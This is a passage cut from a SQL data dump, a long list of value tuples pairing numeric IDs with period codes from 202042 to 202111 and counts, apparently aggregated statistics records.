2042',9),(3005,1,'202042',9),(3027,1,'202042',9),(3090,1,'202042',9),(467,1,'202042',10),(471,1,'202042',10),(487,1,'202042',10),(488,1,'202042',10),(1703,1,'202042',10),(1737,1,'202042',10),(1768,1,'202042',10),(2150,1,'202042',10),(2156,1,'202042',10),(2161,1,'202042',10),(2165,1,'202042',10),(2178,1,'202042',10),(2296,1,'202042',10),(2704,1,'202042',10),(2956,1,'202042',10),(3004,1,'202042',10),(3030,1,'202042',10),(3066,1,'202042',10),(3069,1,'202042',10),(3079,1,'202042',10),(3081,1,'202042',10),(3104,1,'202042',10),(468,1,'202042',11),(1713,1,'202042',11),(2457,1,'202042',11),(2751,1,'202042',11),(2813,1,'202042',11),(2989,1,'202042',11),(3097,1,'202042',11),(3102,1,'202042',11),(470,1,'202042',12),(570,1,'202042',12),(1724,1,'202042',12),(2248,1,'202042',12),(2309,1,'202042',12),(2769,1,'202042',12),(3060,1,'202042',12),(3072,1,'202042',12),(3117,1,'202042',12),(1586,1,'202042',13),(2609,1,'202042',13),(2617,1,'202042',13),(2658,1,'202042',13),(2801,1,'202042',13),(474,1,'202042',14),(2965,1,'202042',14),(3087,1,'202042',14),(478,1,'202042',15),(1582,1,'202042',15),(1606,1,'202042',15),(473,1,'202042',17),(1604,1,'202042',17),(1588,1,'202042',18),(1600,1,'202042',20),(1614,1,'202042',23),(467,1,'202043',1),(468,1,'202043',1),(472,1,'202043',1),(476,1,'202043',1),(483,1,'202043',1),(1584,1,'202043',1),(1596,1,'202043',1),(1610,1,'202043',1),(1695,1,'202043',1),(1701,1,'202043',1),(1705,1,'202043',1),(1707,1,'202043',1),(1709,1,'202043',1),(1711,1,'202043',1),(1713,1,'202043',1),(1718,1,'202043',1),(1724,1,'202043',1),(1737,1,'202043',1),(1741,1,'202043',1),(1745,1,'202043',1),(1747,1,'202043',1),(1768,1,'202043',1),(2150,1,'202043',1),(2252,1,'202043',1),(2297,1,'202043',1),(2558,1,'202043',1),(2804,1,'202043',1),(2989,1,'202043',1),(3034,1,'202043',1),(3038,1,'202043',1),(3060,1,'202043',1),(3087,1,'202043',1),(3090,1,'202043',1),(471,1,'202043',2),(473,1,'202043',2),(478,1,'202043',2),(481,1,'202043',2),(1544,1,'202043',2),(1602,1,'202043',2),(1722,1,'202043',2),(1728,1,'202043',2),(1732,1,'202043',2),(1772,1,'202043',2),(1776,1,'202043',2),(1782,1,'202043',2),(2152,1,'202043',2),(2178,1,'202043',2),(2704,1,'202043',2),(2911,1,'202043',2),(2993,1,'202043',2),(3004,1,'202043',2),(3027,1,'202043',2),(3041,1,'202043',2),(3063,1,'202043',2),(3079,1,'202043',2),(3096,1,'202043',2),(3102,1,'202043',2),(3107,1,'202043',2),(3109,1,'202043',2),(3117,1,'202043',2),(470,1,'202043',3),(474,1,'202043',3),(480,1,'202043',3),(485,1,'202043',3),(486,1,'202043',3),(1590,1,'202043',3),(1592,1,'202043',3),(1594,1,'202043',3),(1608,1,'202043',3),(1612,1,'202043',3),(1699,1,'202043',3),(1720,1,'202043',3),(1730,1,'202043',3),(1739,1,'202043',3),(1749,1,'202043',3),(1770,1,'202043',3),(1774,1,'202043',3),(2063,1,'202043',3),(2159,1,'202043',3),(2161,1,'202043',3),(2248,1,'202043',3),(2293,1,'202043',3),(2296,1,'202043',3),(2748,1,'202043',3),(2809,1,'202043',3),(2813,1,'202043',3),(2956,1,'202043',3),(2964,1,'202043',3),(3006,1,'202043',3),(3045,1,'202043',3),(3081,1,'202043',3),(3083,1,'202043',3),(3127,1,'202043',3),(469,1,'202043',4),(479,1,'202043',4),(484,1,'202043',4),(487,1,'202043',4),(1697,1,'202043',4),(1751,1,'202043',4),(2154,1,'202043',4),(2156,1,'202043',4),(2165,1,'202043',4),(2658,1,'202043',4),(2775,1,'202043',4),(3005,1,'202043',4),(3069,1,'202043',4),(3104,1,'202043',4),(3124,1,'202043',4),(570,1,'202043',5),(2148,1,'202043',5),(2617,1,'202043',5),(2801,1,'202043',5),(3066,1,'202043',5),(3072,1,'202043',5),(3097,1,'202043',5),(1582,1,'202043',6),(1598,1,'202043',6),(1766,1,'202043',6),(1780,1,'202043',6),(2457,1,'202043',6),(2751,1,'202043',6),(2769,1,'202043',6),(1614,1,'202043',7),(2609,1,'202043',7),(3030,1,'202043',7),(1586,1,'202043',9),(1588,1,'202043',9),(2309,1,'202043',10),(1606,1,'202043',11),(1604,1,'202043',14),(1600,1,'202043',17),(102,1,'202106',1),(106,1,'202106',1),(488,1,'202106',1),(1713,1,'202106',1),(1770,1,'202106',1),(1782,1,'202106',1),(2152,1,'202106',1),(2252,1,'202106',1),(2809,1,'202106',1),(3004,1,'202106',1),(3006,1,'202106',1),(3023,1,'202106',1),(3027,1,'202106',1),(3038,1,'202106',1),(3063,1,'202106',1),(3124,1,'202106',1),(3247,1,'202106',1),(3251,1,'202106',1),(3253,1,'202106',1),(3261,1,'202106',1),(3265,1,'202106',1),(3267,1,'202106',1),(3271,1,'202106',1),(3275,1,'202106',1),(3290,1,'202106',1),(467,1,'202106',2),(469,1,'202106',2),(472,1,'202106',2),(478,1,'202106',2),(1697,1,'202106',2),(1705,1,'202106',2),(1715,1,'202106',2),(1732,1,'202106',2),(1741,1,'202106',2),(1745,1,'202106',2),(1749,1,'202106',2),(1772,1,'202106',2),(1776,1,'202106',2),(1778,1,'202106',2),(2150,1,'202106',2),(2156,1,'202106',2),(2161,1,'202106',2),(2296,1,'202106',2),(2911,1,'202106',2),(2956,1,'202106',2),(2964,1,'202106',2),(2993,1,'202106',2),(3034,1,'202106',2),(3041,1,'202106',2),(3102,1,'202106',2),(3245,1,'202106',2),(3249,1,'202106',2),(3263,1,'202106',2),(3269,1,'202106',2),(3278,1,'202106',2),(471,1,'202106',3),(476,1,'202106',3),(477,1,'202106',3),(480,1,'202106',3),(484,1,'202106',3),(486,1,'202106',3),(1707,1,'202106',3),(1711,1,'202106',3),(1720,1,'202106',3),(1726,1,'202106',3),(1728,1,'202106',3),(1730,1,'202106',3),(1743,1,'202106',3),(1747,1,'202106',3),(1768,1,'202106',3),(2148,1,'202106',3),(2293,1,'202106',3),(2297,1,'202106',3),(2704,1,'202106',3),(2804,1,'202106',3),(2965,1,'202106',3),(3092,1,'202106',3),(3229,1,'202106',3),(3240,1,'202106',3),(3243,1,'202106',3),(3257,1,'202106',3),(3273,1,'202106',3),(3297,1,'202106',3),(3307,1,'202106',3),(3313,1,'202106',3),(3438,1,'202106',3),(483,1,'202106',4),(1584,1,'202106',4),(1610,1,'202106',4),(1695,1,'202106',4),(1699,1,'202106',4),(1703,1,'202106',4),(1709,1,'202106',4),(1718,1,'202106',4),(1734,1,'202106',4),(1737,1,'202106',4),(1739,1,'202106',4),(1751,1,'202106',4),(1780,1,'202106',4),(2154,1,'202106',4),(2165,1,'202106',4),(2248,1,'202106',4),(2813,1,'202106',4),(2989,1,'202106',4),(3096,1,'202106',4),(3104,1,'202106',4),(3109,1,'202106',4),(3226,1,'202106',4),(3316,1,'202106',4),(485,1,'202106',5),(570,1,'202106',5),(1701,1,'202106',5),(2063,1,'202106',5),(2558,1,'202106',5),(2617,1,'202106',5),(2658,1,'202106',5),(3005,1,'202106',5),(3072,1,'202106',5),(3079,1,'202106',5),(3090,1,'202106',5),(3097,1,'202106',5),(3259,1,'202106',5),(479,1,'202106',6),(481,1,'202106',6),(1604,1,'202106',6),(1722,1,'202106',6),(1766,1,'202106',6),(1774,1,'202106',6),(2159,1,'202106',6),(2751,1,'202106',6),(2991,1,'202106',6),(3060,1,'202106',6),(3066,1,'202106',6),(3107,1,'202106',6),(3127,1,'202106',6),(473,1,'202106',7),(474,1,'202106',7),(1612,1,'202106',7),(1724,1,'202106',7),(2178,1,'202106',7),(2801,1,'202106',7),(3030,1,'202106',7),(3083,1,'202106',7),(3087,1,'202106',7),(3430,1,'202106',7),(468,1,'202106',8),(1596,1,'202106',8),(1602,1,'202106',8),(2457,1,'202106',8),(2609,1,'202106',8),(470,1,'202106',9),(1614,1,'202106',9),(1544,1,'202106',10),(1588,1,'202106',10),(1590,1,'202106',10),(1598,1,'202106',10),(1606,1,'202106',10),(108,1,'202106',11),(3280,1,'202106',11),(3282,1,'202106',11),(3479,1,'202106',11),(482,1,'202106',12),(1592,1,'202106',12),(1594,1,'202106',12),(1608,1,'202106',12),(2769,1,'202106',12),(3285,1,'202106',12),(3287,1,'202106',12),(487,1,'202106',13),(2775,1,'202106',13),(2904,1,'202106',13),(3486,1,'202106',13),(3489,1,'202106',13),(3069,1,'202106',14),(3482,1,'202106',14),(72,1,'202106',15),(74,1,'202106',15),(87,1,'202106',15),(335,1,'202106',15),(84,1,'202106',16),(76,1,'202106',17),(68,1,'202106',18),(2309,1,'202106',18),(3117,1,'202106',18),(1600,1,'202106',22),(2503,1,'202106',22),(89,1,'202106',23),(91,1,'202106',23),(1582,1,'202106',24),(3045,1,'202106',24),(80,1,'202106',38),(1586,1,'202106',44),(9,1,'202106',526),(110,1,'202107',1),(482,1,'202107',1),(1695,1,'202107',1),(3092,1,'202107',1),(102,1,'202107',2),(106,1,'202107',2),(480,1,'202107',2),(488,1,'202107',2),(2293,1,'202107',2),(1715,1,'202107',3),(1720,1,'202107',3),(1726,1,'202107',3),(1728,1,'202107',3),(1734,1,'202107',3),(3041,1,'202107',3),(3124,1,'202107',3),(3240,1,'202107',3),(3261,1,'202107',3),(3269,1,'202107',3),(3290,1,'202107',3),(3297,1,'202107',3),(469,1,'202107',4),(483,1,'202107',4),(485,1,'202107',4),(1584,1,'202107',4),(1768,1,'202107',4),(2150,1,'202107',4),(2154,1,'202107',4),(2161,1,'202107',4),(2704,1,'202107',4),(2991,1,'202107',4),(3006,1,'202107',4),(3023,1,'202107',4),(3038,1,'202107',4),(3072,1,'202107',4),(3265,1,'202107',4),(471,1,'202107',5),(476,1,'202107',5),(484,1,'202107',5),(1699,1,'202107',5),(1732,1,'202107',5),(1749,1,'202107',5),(1751,1,'202107',5),(1772,1,'202107',5),(2248,1,'202107',5),(2252,1,'202107',5),(2296,1,'202107',5),(2748,1,'202107',5),(2964,1,'202107',5),(2965,1,'202107',5),(3245,1,'202107',5),(3249,1,'202107',5),(3267,1,'202107',5),(3271,1,'202107',5),(3273,1,'202107',5),(3307,1,'202107',5),(3316,1,'202107',5),(486,1,'202107',6),(1707,1,'202107',6),(1724,1,'202107',6),(1780,1,'202107',6),(2152,1,'202107',6),(2809,1,'202107',6),(2993,1,'202107',6),(3066,1,'202107',6),(3226,1,'202107',6),(3438,1,'202107',6),(474,1,'202107',7),(479,1,'202107',7),(1697,1,'202107',7),(1703,1,'202107',7),(1705,1,'202107',7),(1770,1,'202107',7),(1776,1,'202107',7),(1778,1,'202107',7),(1782,1,'202107',7),(2063,1,'202107',7),(2148,1,'202107',7),(2297,1,'202107',7),(2457,1,'202107',7),(3004,1,'202107',7),(3027,1,'202107',7),(3102,1,'202107',7),(3229,1,'202107',7),(3247,1,'202107',7),(3251,1,'202107',7),(3278,1,'202107',7),(472,1,'202107',8),(1739,1,'202107',8),(1743,1,'202107',8),(1747,1,'202107',8),(2165,1,'202107',8),(3063,1,'202107',8),(3079,1,'202107',8),(3253,1,'202107',8),(3263,1,'202107',8),(487,1,'202107',9),(1709,1,'202107',9),(1713,1,'202107',9),(1774,1,'202107',9),(3060,1,'202107',9),(3104,1,'202107',9),(3275,1,'202107',9),(3313,1,'202107',9),(478,1,'202107',10),(1737,1,'202107',10),(2178,1,'202107',10),(3087,1,'202107',10),(3090,1,'202107',10),(3096,1,'202107',10),(3097,1,'202107',10),(3243,1,'202107',10),(3259,1,'202107',10),(467,1,'202107',11),(477,1,'202107',11),(1701,1,'202107',11),(1711,1,'202107',11),(1722,1,'202107',11),(1741,1,'202107',11),(1745,1,'202107',11),(2156,1,'202107',11),(2801,1,'202107',11),(2804,1,'202107',11),(3030,1,'202107',11),(3034,1,'202107',11),(3257,1,'202107',11),(3430,1,'202107',11),(3498,1,'202107',11),(1730,1,'202107',12),(1766,1,'202107',12),(2956,1,'202107',12),(3069,1,'202107',12),(3083,1,'202107',12),(3109,1,'202107',12),(3479,1,'202107',12),(1544,1,'202107',13),(1590,1,'202107',13),(1718,1,'202107',13),(2658,1,'202107',13),(2813,1,'202107',13),(2989,1,'202107',13),(3482,1,'202107',13),(2503,1,'202107',14),(2558,1,'202107',14),(3282,1,'202107',14),(3486,1,'202107',14),(473,1,'202107',15),(570,1,'202107',15),(3107,1,'202107',15),(3127,1,'202107',15),(470,1,'202107',16),(481,1,'202107',16),(1592,1,'202107',16),(1598,1,'202107',16),(1610,1,'202107',16),(2609,1,'202107',16),(2617,1,'202107',16),(2751,1,'202107',16),(335,1,'202107',17),(1596,1,'202107',17),(2775,1,'202107',17),(2911,1,'202107',17),(3280,1,'202107',17),(3285,1,'202107',17),(3287,1,'202107',17),(3489,1,'202107',17),(87,1,'202107',18),(468,1,'202107',18),(1588,1,'202107',18),(1604,1,'202107',18),(1612,1,'202107',18),(2159,1,'202107',18),(1608,1,'202107',19),(1614,1,'202107',20),(2904,1,'202107',20),(74,1,'202107',21),(108,1,'202107',21),(3005,1,'202107',21),(1606,1,'202107',22),(72,1,'202107',23),(89,1,'202107',23),(84,1,'202107',24),(1602,1,'202107',24),(2769,1,'202107',27),(3117,1,'202107',27),(1594,1,'202107',29),(76,1,'202107',30),(1582,1,'202107',35),(1600,1,'202107',35),(68,1,'202107',36),(91,1,'202107',41),(2309,1,'202107',44),(1586,1,'202107',61),(80,1,'202107',62),(3045,1,'202107',85),(9,1,'202107',843),(106,1,'202108',2),(3107,1,'202108',2),(3229,1,'202108',2),(3297,1,'202108',2),(3038,1,'202108',3),(3063,1,'202108',3),(3072,1,'202108',3),(3096,1,'202108',3),(3102,1,'202108',3),(3313,1,'202108',3),(3316,1,'202108',3),(1726,1,'202108',4),(1751,1,'202108',4),(1778,1,'202108',4),(1782,1,'202108',4),(2911,1,'202108',4),(3034,1,'202108',4),(3124,1,'202108',4),(3247,1,'202108',4),(3249,1,'202108',4),(3278,1,'202108',4),(3290,1,'202108',4),(3430,1,'202108',4),(471,1,'202108',5),(481,1,'202108',5),(484,1,'202108',5),(1705,1,'202108',5),(1745,1,'202108',5),(1780,1,'202108',5),(2148,1,'202108',5),(2156,1,'202108',5),(2704,1,'202108',5),(2804,1,'202108',5),(2809,1,'202108',5),(2965,1,'202108',5),(2991,1,'202108',5),(2993,1,'202108',5),(3245,1,'202108',5),(3259,1,'202108',5),(3269,1,'202108',5),(3275,1,'202108',5),(3479,1,'202108',5),(102,1,'202108',6),(472,1,'202108',6),(477,1,'202108',6),(478,1,'202108',6),(480,1,'202108',6),(1699,1,'202108',6),(1701,1,'202108',6),(1703,1,'202108',6),(1711,1,'202108',6),(1720,1,'202108',6),(1722,1,'202108',6),(1728,1,'202108',6),(1732,1,'202108',6),(1739,1,'202108',6),(1741,1,'202108',6),(1743,1,'202108',6),(1747,1,'202108',6),(1772,1,'202108',6),(1776,1,'202108',6),(2152,1,'202108',6),(2154,1,'202108',6),(2248,1,'202108',6),(2252,1,'202108',6),(2748,1,'202108',6),(2964,1,'202108',6),(3027,1,'202108',6),(3087,1,'202108',6),(3090,1,'202108',6),(3092,1,'202108',6),(3240,1,'202108',6),(3265,1,'202108',6),(3273,1,'202108',6),(3307,1,'202108',6),(3438,1,'202108',6),(469,1,'202108',7),(476,1,'202108',7),(482,1,'202108',7),(485,1,'202108',7),(1584,1,'202108',7),(1606,1,'202108',7),(1695,1,'202108',7),(1709,1,'202108',7),(1713,1,'202108',7),(1730,1,'202108',7),(1734,1,'202108',7),(1737,1,'202108',7),(1749,1,'202108',7),(1768,1,'202108',7),(1770,1,'202108',7),(2165,1,'202108',7),(2296,1,'202108',7),(2751,1,'202108',7),(2775,1,'202108',7),(3004,1,'202108',7),(3006,1,'202108',7),(3023,1,'202108',7),(3066,1,'202108',7),(3069,1,'202108',7),(3079,1,'202108',7),(3083,1,'202108',7),(3097,1,'202108',7),(3104,1,'202108',7),(3109,1,'202108',7),(3243,1,'202108',7),(3263,1,'202108',7),(3267,1,'202108',7),(483,1,'202108',8),(486,1,'202108',8),(488,1,'202108',8),(1715,1,'202108',8),(1766,1,'202108',8),(2161,1,'202108',8),(2178,1,'202108',8),(2558,1,'202108',8),(2989,1,'202108',8),(3261,1,'202108',8),(468,1,'202108',9),(479,1,'202108',9),(1610,1,'202108',9),(1707,1,'202108',9),(1724,1,'202108',9),(1774,1,'202108',9),(2658,1,'202108',9),(2801,1,'202108',9),(3041,1,'202108',9),(3060,1,'202108',9),(3117,1,'202108',9),(3127,1,'202108',9),(3251,1,'202108',9),(3253,1,'202108',9),(3271,1,'202108',9),(487,1,'202108',10),(2150,1,'202108',10),(2293,1,'202108',10),(470,1,'202108',11),(474,1,'202108',11),(1544,1,'202108',11),(1612,1,'202108',11),(1697,1,'202108',11),(2063,1,'202108',11),(2457,1,'202108',11),(2813,1,'202108',11),(3226,1,'202108',11),(473,1,'202108',12),(1592,1,'202108',12),(1598,1,'202108',12),(1608,1,'202108',12),(1718,1,'202108',12),(2617,1,'202108',12),(3005,1,'202108',12),(3030,1,'202108',12),(3257,1,'202108',12),(570,1,'202108',13),(2297,1,'202108',14),(3287,1,'202108',14),(87,1,'202108',15),(335,1,'202108',15),(1590,1,'202108',15),(2609,1,'202108',15),(2769,1,'202108',15),(3045,1,'202108',15),(3285,1,'202108',15),(3486,1,'202108',15),(1596,1,'202108',16),(2159,1,'202108',17),(3498,1,'202108',17),(108,1,'202108',18),(1602,1,'202108',18),(2956,1,'202108',18),(3280,1,'202108',18),(74,1,'202108',19),(1604,1,'202108',19),(3282,1,'202108',19),(3482,1,'202108',19),(1582,1,'202108',20),(1588,1,'202108',20),(2904,1,'202108',20),(72,1,'202108',21),(2503,1,'202108',22),(1594,1,'202108',23),(84,1,'202108',24),(76,1,'202108',25),(467,1,'202108',25),(89,1,'202108',26),(2309,1,'202108',29),(68,1,'202108',33),(3489,1,'202108',33),(1600,1,'202108',35),(91,1,'202108',38),(1586,1,'202108',59),(80,1,'202108',68),(1614,1,'202108',95),(9,1,'202108',804),(3090,1,'202109',1),(3063,1,'202109',2),(110,1,'202109',3),(3027,1,'202109',3),(3117,1,'202109',3),(3124,1,'202109',3),(106,1,'202109',4),(480,1,'202109',4),(1705,1,'202109',4),(1720,1,'202109',4),(1724,1,'202109',4),(1772,1,'202109',4),(2617,1,'202109',4),(2801,1,'202109',4),(2809,1,'202109',4),(3045,1,'202109',4),(3069,1,'202109',4),(3072,1,'202109',4),(3109,1,'202109',4),(3290,1,'202109',4),(3297,1,'202109',4),(471,1,'202109',5),(472,1,'202109',5),(481,1,'202109',5),(482,1,'202109',5),(484,1,'202109',5),(485,1,'202109',5),(1768,1,'202109',5),(2748,1,'202109',5),(2911,1,'202109',5),(2989,1,'202109',5),(2993,1,'202109',5),(3038,1,'202109',5),(3060,1,'202109',5),(3253,1,'202109',5),(3265,1,'202109',5),(3316,1,'202109',5),(477,1,'202109',6),(478,1,'202109',6),(486,1,'202109',6),(488,1,'202109',6),(1701,1,'202109',6),(1718,1,'202109',6),(1728,1,'202109',6),(1749,1,'202109',6),(1751,1,'202109',6),(1770,1,'202109',6),(2150,1,'202109',6),(2751,1,'202109',6),(2964,1,'202109',6),(2965,1,'202109',6),(3006,1,'202109',6),(3066,1,'202109',6),(3087,1,'202109',6),(3092,1,'202109',6),(3240,1,'202109',6),(3243,1,'202109',6),(3245,1,'202109',6),(3267,1,'202109',6),(3275,1,'202109',6),(3307,1,'202109',6),(3313,1,'202109',6),(102,1,'202109',7),(476,1,'202109',7),(479,1,'202109',7),(570,1,'202109',7),(1711,1,'202109',7),(1722,1,'202109',7),(1726,1,'202109',7),(1730,1,'202109',7),(1743,1,'202109',7),(1747,1,'202109',7),(2152,1,'202109',7),(2165,1,'202109',7),(2248,1,'202109',7),(2252,1,'202109',7),(2293,1,'202109',7),(2296,1,'202109',7),(2704,1,'202109',7),(2804,1,'202109',7),(2991,1,'202109',7),(3023,1,'202109',7),(3079,1,'202109',7),(3097,1,'202109',7),(3104,1,'202109',7),(3107,1,'202109',7),(3127,1,'202109',7),(3226,1,'202109',7),(3229,1,'202109',7),(3247,1,'202109',7),(3251,1,'202109',7),(3259,1,'202109',7),(3261,1,'202109',7),(3269,1,'202109',7),(3273,1,'202109',7),(3430,1,'202109',7),(1584,1,'202109',8),(1610,1,'202109',8),(1695,1,'202109',8),(1709,1,'202109',8),(1732,1,'202109',8),(1739,1,'202109',8),(1745,1,'202109',8),(1774,1,'202109',8),(1780,1,'202109',8),(2558,1,'202109',8),(2813,1,'202109',8),(2956,1,'202109',8),(3083,1,'202109',8),(3096,1,'202109',8),(3271,1,'202109',8),(3438,1,'202109',8),(469,1,'202109',9),(483,1,'202109',9),(487,1,'202109',9),(1590,1,'202109',9),(1592,1,'202109',9),(1703,1,'202109',9),(1766,1,'202109',9),(2063,1,'202109',9),(2156,1,'202109',9),(2178,1,'202109',9),(2775,1,'202109',9),(3034,1,'202109',9),(3263,1,'202109',9),(3278,1,'202109',9),(3479,1,'202109',9),(470,1,'202109',10),(1699,1,'202109',10),(1707,1,'202109',10),(1715,1,'202109',10),(1734,1,'202109',10),(1737,1,'202109',10),(1782,1,'202109',10),(3004,1,'202109',10),(3102,1,'202109',10),(3249,1,'202109',10),(3257,1,'202109',10),(1697,1,'202109',11),(1741,1,'202109',11),(2148,1,'202109',11),(2154,1,'202109',11),(3041,1,'202109',11),(3482,1,'202109',11),(1612,1,'202109',12),(2658,1,'202109',12),(3030,1,'202109',12),(2297,1,'202109',13),(3005,1,'202109',13),(3486,1,'202109',13),(473,1,'202109',14),(474,1,'202109',14),(1776,1,'202109',14),(468,1,'202109',15),(1544,1,'202109',15),(1713,1,'202109',15),(2161,1,'202109',15),(2609,1,'202109',15),(1582,1,'202109',16),(1604,1,'202109',16),(1594,1,'202109',17),(1596,1,'202109',17),(1778,1,'202109',17),(335,1,'202109',19),(1588,1,'202109',19),(3280,1,'202109',19),(3285,1,'202109',19),(3287,1,'202109',19),(3534,1,'202109',19),(1606,1,'202109',21),(1608,1,'202109',21),(467,1,'202109',22),(2769,1,'202109',22),(3282,1,'202109',22),(1598,1,'202109',23),(2457,1,'202109',23),(84,1,'202109',24),(1602,1,'202109',24),(3498,1,'202109',24),(74,1,'202109',25),(3531,1,'202109',25),(2159,1,'202109',27),(87,1,'202109',28),(72,1,'202109',29),(108,1,'202109',29),(76,1,'202109',30),(2904,1,'202109',30),(89,1,'202109',34),(2503,1,'202109',34),(3489,1,'202109',34),(1614,1,'202109',36),(2309,1,'202109',38),(68,1,'202109',39),(1600,1,'202109',48),(91,1,'202109',59),(1586,1,'202109',60),(80,1,'202109',65),(9,1,'202109',836),(106,1,'202110',1),(476,1,'202110',1),(479,1,'202110',1),(483,1,'202110',1),(486,1,'202110',1),(487,1,'202110',1),(1584,1,'202110',1),(1697,1,'202110',1),(1703,1,'202110',1),(1715,1,'202110',1),(1728,1,'202110',1),(1732,1,'202110',1),(1734,1,'202110',1),(1749,1,'202110',1),(1768,1,'202110',1),(1776,1,'202110',1),(1778,1,'202110',1),(2063,1,'202110',1),(2152,1,'202110',1),(2293,1,'202110',1),(2748,1,'202110',1),(2775,1,'202110',1),(2813,1,'202110',1),(2964,1,'202110',1),(2965,1,'202110',1),(3006,1,'202110',1),(3023,1,'202110',1),(3027,1,'202110',1),(3034,1,'202110',1),(3041,1,'202110',1),(3096,1,'202110',1),(3097,1,'202110',1),(3117,1,'202110',1),(3124,1,'202110',1),(3240,1,'202110',1),(3243,1,'202110',1),(3269,1,'202110',1),(3307,1,'202110',1),(3438,1,'202110',1),(469,1,'202110',2),(471,1,'202110',2),(474,1,'202110',2),(477,1,'202110',2),(478,1,'202110',2),(484,1,'202110',2),(1695,1,'202110',2),(1701,1,'202110',2),(1705,1,'202110',2),(1709,1,'202110',2),(1711,1,'202110',2),(1722,1,'202110',2),(1743,1,'202110',2),(1745,1,'202110',2),(1772,1,'202110',2),(1780,1,'202110',2),(1782,1,'202110',2),(2161,1,'202110',2),(2558,1,'202110',2),(2801,1,'202110',2),(2956,1,'202110',2),(3087,1,'202110',2),(3104,1,'202110',2),(3226,1,'202110',2),(3247,1,'202110',2),(3253,1,'202110',2),(3263,1,'202110',2),(3267,1,'202110',2),(3275,1,'202110',2),(3278,1,'202110',2),(3280,1,'202110',2),(3316,1,'202110',2),(470,1,'202110',3),(485,1,'202110',3),(488,1,'202110',3),(1590,1,'202110',3),(1699,1,'202110',3),(1707,1,'202110',3),(1713,1,'202110',3),(1726,1,'202110',3),(1747,1,'202110',3),(1751,1,'202110',3),(1774,1,'202110',3),(2150,1,'202110',3),(2296,1,'202110',3),(2658,1,'202110',3),(2751,1,'202110',3),(3004,1,'202110',3),(3038,1,'202110',3),(3060,1,'202110',3),(3066,1,'202110',3),(3102,1,'202110',3),(3109,1,'202110',3),(3271,1,'202110',3),(3290,1,'202110',3),(3297,1,'202110',3),(3313,1,'202110',3),(3486,1,'202110',3),(481,1,'202110',4),(482,1,'202110',4),(1737,1,'202110',4),(1766,1,'202110',4),(2148,1,'202110',4),(2178,1,'202110',4),(2248,1,'202110',4),(2252,1,'202110',4),(2989,1,'202110',4),(2991,1,'202110',4),(3079,1,'202110',4),(3090,1,'202110',4),(3107,1,'202110',4),(3229,1,'202110',4),(3257,1,'202110',4),(3259,1,'202110',4),(3265,1,'202110',4),(3282,1,'202110',4),(468,1,'202110',5),(1544,1,'202110',5),(1724,1,'202110',5),(2165,1,'202110',5),(2617,1,'202110',5),(2993,1,'202110',5),(3045,1,'202110',5),(3063,1,'202110',5),(3127,1,'202110',5),(3245,1,'202110',5),(3479,1,'202110',5),(102,1,'202110',6),(335,1,'202110',6),(570,1,'202110',6),(3005,1,'202110',6),(3273,1,'202110',6),(108,1,'202110',7),(472,1,'202110',7),(1588,1,'202110',7),(1720,1,'202110',7),(2154,1,'202110',7),(2297,1,'202110',7),(2704,1,'202110',7),(2904,1,'202110',7),(3069,1,'202110',7),(3285,1,'202110',7),(3287,1,'202110',7),(3482,1,'202110',7),(3498,1,'202110',7),(74,1,'202110',8),(480,1,'202110',8),(1606,1,'202110',8),(3072,1,'202110',8),(3092,1,'202110',8),(84,1,'202110',9),(1592,1,'202110',9),(1718,1,'202110',9),(3261,1,'202110',9),(3531,1,'202110',9),(72,1,'202110',10),(1594,1,'202110',10),(1596,1,'202110',10),(1608,1,'202110',10),(1610,1,'202110',10),(3489,1,'202110',11),(3083,1,'202110',12),(2911,1,'202110',13),(3541,1,'202110',13),(1604,1,'202110',14),(76,1,'202110',15),(1614,1,'202110',15),(2457,1,'202110',15),(89,1,'202110',16),(473,1,'202110',16),(1612,1,'202110',16),(2609,1,'202110',16),(467,1,'202110',17),(1602,1,'202110',17),(2503,1,'202110',17),(2769,1,'202110',17),(3030,1,'202110',17),(87,1,'202110',18),(68,1,'202110',21),(1582,1,'202110',22),(1598,1,'202110',22),(2159,1,'202110',24),(3534,1,'202110',26),(2309,1,'202110',32),(91,1,'202110',35),(1600,1,'202110',42),(80,1,'202110',48),(1586,1,'202110',90),(9,1,'202110',858),(106,1,'202111',1),(1747,1,'202111',1),(3257,1,'202111',1),(479,1,'202111',2),(483,1,'202111',2),(1722,1,'202111',2),(1724,1,'202111',2),(1739,1,'202111',2),(1741,1,'202111',2),(1782,1,'202111',2),(2148,1,'202111',2),(2965,1,'202111',2),(2991,1,'202111',2),(3063,1,'202111',2),(3096,1,'202111',2),(3102,1,'202111',2),(3297,1,'202111',2),(3316,1,'202111',2),(3438,1,'202111',2),(3479,1,'202111',2),(102,1,'202111',3),(1695,1,'202111',3),(1705,1,'202111',3),(1726,1,'202111',3),(1730,1,'202111',3),(1772,1,'202111',3),(1776,1,'202111',3),(2152,1,'202111',3),(2252,1,'202111',3),(3027,1,'202111',3),(3087,1,'202111',3),(3117,1,'202111',3),(3229,1,'202111',3),(3245,1,'202111',3),(3247,1,'202111',3),(3249,1,'202111',3),(3253,1,'202111',3),(3269,1,'202111',3),(3271,1,'202111',3),(3273,1,'202111',3),(3313,1,'202111',3),(110,1,'202111',4),(472,1,'202111',4),(477,1,'202111',4),(478,1,'202111',4),(480,1,'202111',4),(486,1,'202111',4),(1584,1,'202111',4),(1590,1,'202111',4),(1697,1,'202111',4),(1703,1,'202111',4),(1711,1,'202111',4),(1728,1,'202111',4),(1743,1,'202111',4),(1749,1,'202111',4),(1768,1,'202111',4),(2165,1,'202111',4),(2748,1,'202111',4),(2809,1,'202111',4),(2956,1,'202111',4),(2993,1,'202111',4),(3004,1,'202111',4),(3041,1,'202111',4),(3045,1,'202111',4),(3060,1,'202111',4),(3069,1,'202111',4),(3109,1,'202111',4),(3124,1,'202111',4),(3240,1,'202111',4),(3263,1,'202111',4),(3280,1,'202111',4),(3290,1,'202111',4),(3430,1,'202111',4),(3482,1,'202111',4),(471,1,'202111',5),(473,1,'202111',5),(476,1,'202111',5),(482,1,'202111',5),(485,1,'202111',5),(1701,1,'202111',5),(1707,1,'202111',5),(1734,1,'202111',5),(1737,1,'202111',5),(1745,1,'202111',5),(1751,1,'202111',5),(1778,1,'202111',5),(2154,1,'202111',5),(2156,1,'202111',5),(2248,1,'202111',5),(2296,1,'202111',5),(2964,1,'202111',5),(3023,1,'202111',5),(3243,1,'202111',5),(3261,1,'202111',5),(3265,1,'202111',5),(3275,1,'202111',5),(3278,1,'202111',5),(1732,1,'202111',6),(1780,1,'202111',6),(2150,1,'202111',6),(2293,1,'202111',6),(2704,1,'202111',6),(2775,1,'202111',6),(3066,1,'202111',6),(3079,1,'202111',6),(3090,1,'202111',6),(3226,1,'202111',6),(3307,1,'202111',6),(3486,1,'202111',6),(474,1,